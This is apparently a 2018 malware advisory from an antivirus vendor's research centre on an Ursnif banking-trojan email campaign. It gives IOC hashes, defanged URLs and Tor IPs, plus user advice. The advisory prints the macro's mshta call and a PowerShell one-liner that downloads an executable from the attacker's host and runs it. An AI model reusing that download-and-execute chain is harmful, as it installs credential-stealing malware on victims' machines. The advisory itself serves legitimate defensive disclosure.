TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email campaign spreading the Ursnif malware sent on March 9 2018.
Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails
|
INDEX
|
"Ursnif" malware campaign
Malware family:
Ursnif
VirIT: Trojan.Win32.Ursnif.EN, Trojan.DOC.Dropper.ON, Trojan.DOC.Dropper.OM
Description:
The mail campaign started this morning on March 09, 2018
|
Subject:cambia in base alla mail che si riceve]
|
Vedi allegato e di confermare.
(Good morning,
See attached and to confirm.) |
How it spreads:
It exploits e-mail accounts configured in the infected pc, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (visible above in red), while the subject is different because it answers to messages received by the victim and therefore varies according to them.
The malicious attachment in the email is a DOC file containing an AutoClose MACRO that, as soon as it is started, downloads the malware and runs it.
The Autoclose macro first executes the MSHTA.EXE file by passing it, as a parameter, the url address for the download of a script for PowerShell.
C:\Windows\System32\mshta.exe http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
Then a script is downloaded and executed by PowerShell:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class', $env:APPDATA + '\\f0b41f3.exe'); Start-Process $env:APPDATA'\\f0b41f3.exe'; (New-Object System.Net.WebClient).DownloadString('http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd');
The PoweShell script downloads the Ursnif from the site
http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class and puts it into automatic execution.
Concerning the DOC files analyzed, the malware is downloaded from the following sites:
- http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
- http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
- http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd
The malware, after being started, creates a key inHKCU\Software\Microsoft\Windows\CurrentVersion\Run con [valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.
The Ursnif malware makes an injection into the process EXPLORER.EXE
Examples:
Nome: ACLU8THK.EXE
MD5: 3DE11A393F9376C928B2D8CEA7EE4744
Dimensione: 394.752 byte
Data di compilazione: 09/03/2018 03.26.42
Nome: APPIASDS.EXE
MD5: EE1B1D695CE9DD10E34E4859AA2D8E87
Dimensione: 445.712 byte
Data di compilazione: 09/03/2018 08.10.25
Note:
The malware downloaded, is part of the Ursnif family and its peculiarities are to steal access passwords to important sites such as may be home banking, mail, ftp etc.
IOC:
File DOC MD5:
009E418C23008DBFA822CC77834F21EA
0DE8916665C11B76516336A705444F09
1CC733CEA05F83552A7B0F297D5C88F6
24F007E217C5F37124588A17E1C341E8
30FD4C64074BB30E2A50038A92EFAA6C
444FAD5850FA6ACD780C89DA4EA0ACE8
4A0790CD1D27ACE1E6481398ECE32F8C
4B975321733C73F70A65F1FD489D10CF
4C9E026FB64E7D63DC21F98D380CA0D7
6FAE6B27BC91BEDEF51D5046720D0F1C
75634D68D9F162380ABC0AF8BAD20DA7
7EAA57DCC1FA83662C0F2E26ED52BEF8
7F87732379661DBB19A93F3EB1A354D1
871BB91657BCB31A909B3B7DB17727B8
9EE85BA5FDFA6E88EC30BA2733A5F4FA
A2DC123791E75121FE03A60497AD03FB
A4236F32C28BA2F72D2FE0A8B8F9829C
A5D58B583E42C8AD5E07FD48559421DC
AE2E24AB2ED8BAC1CC6326B16F56B4E4
BC2D30BAC1584B539EE6C9BD0B2759D8
CEB5B8FF653221F5000F489844F9E149
D00743082B6167BB1493B1589D9F00BB
DB796A8719C4A037134CD5C78B51BDCF
E1EC19D2B150EB4897AEBC73A6096639
FA791AE1467A9939B643388F1A9536B1
FD1C8219BD982577418394F14844A5D1
File EXE MD5:
3DE11A393F9376C928B2D8CEA7EE4744
BA732A11F27DA190EF0AC40E6F7CC151
EE1B1D695CE9DD10E34E4859AA2D8E87
URL:
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnere
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerd
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerc
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnerb
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itnera
http://auwhguahsdusahdsd[.]com/REX/slick[.]php?utma=itner
http://auwhguahsdusahdsd[.]com/NOC/itnere[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerd[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerc[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnerb[.]class
http://auwhguahsdusahdsd[.]com/NOC/itnera[.]class
http://auwhguahsdusahdsd[.]com/NOC/itner[.]class
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnere
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerd
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnerc
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itnera
http://auwhguahsdusahdsd[.]com/REX/freddie[.]php?l=itner
Smtp contattati:
smtp.rambler.ru (ip: 81.19.77.165)
Tor IP contattati:
138.197.168.63:443
142.44.210.91:9001
146.185.189.197:443
158.69.119.35:9001
159.203.178.178:443
161.97.195.50:443
162.209.96.48:443
163.172.175.174:9001
163.172.216.195:9001
167.114.113.134:9001
176.31.101.92:9938
176.9.133.154:110
176.9.54.142:9001
178.159.0.38:443
178.16.208.56:443
178.16.208.59:443
178.32.189.88:443
178.32.61.9:9001
178.62.43.5:443
178.79.161.177:9001
18.82.3.136:9001
185.106.122.188:443
185.129.249.124:9001
185.22.174.46:9001
185.86.151.231:9001
188.241.58.216:443
192.52.167.71:443
192.99.13.48:9001
193.11.114.45:9002
194.63.142.11:443
195.154.250.239:443
195.181.216.59:443
195.201.20.82:21
195.62.53.196:16465
212.32.230.216:810
212.51.134.123:9001
213.152.168.27:443
217.182.198.76:9001
217.197.91.145:443
217.79.178.60:443
37.200.99.251:9001
46.101.104.245:9001
46.101.183.160:443
46.20.35.114:443
5.135.234.164:9001
5.39.33.178:9001
5.9.121.207:443
50.7.151.47:443
51.15.92.182:443
51.175.193.142:443
54.36.120.156:443
54.88.165.229:80
62.210.123.24:443
62.210.204.55:9031
77.87.49.6:8080
77.87.49.6:9002
78.142.19.11:443
78.46.217.214:443
85.204.74.139:443
85.25.43.31:443
86.110.117.166:7588
86.59.21.38:443
87.122.34.72:9001
87.73.84.77:443
91.121.23.100:8001
91.121.23.100:9001
91.233.116.51:443
93.115.91.66:443
93.180.157.154:9001
94.130.183.13:443
95.130.9.210:443
95.130.9.76:9001
95.141.83.146:443
95.183.52.172:443
How to identify a fake email
Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of
ZIP-formatted attachments and, if possible, DO NOT enable automatic
macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening
Word and
Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a
Banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions
even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the workstation involved is used for home-banking transactions, an assessment with your
credit institution is also recommended
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts
Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
- Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
- Save the e-mail to be sent to the TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files(http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,
Vir.IT eXplorer Lite has the following special features: |
 |
- freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
- It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
- Through Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
 |
For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTS.
|
C.R.A.M.
TG Soft's Anti-Malware Research Center
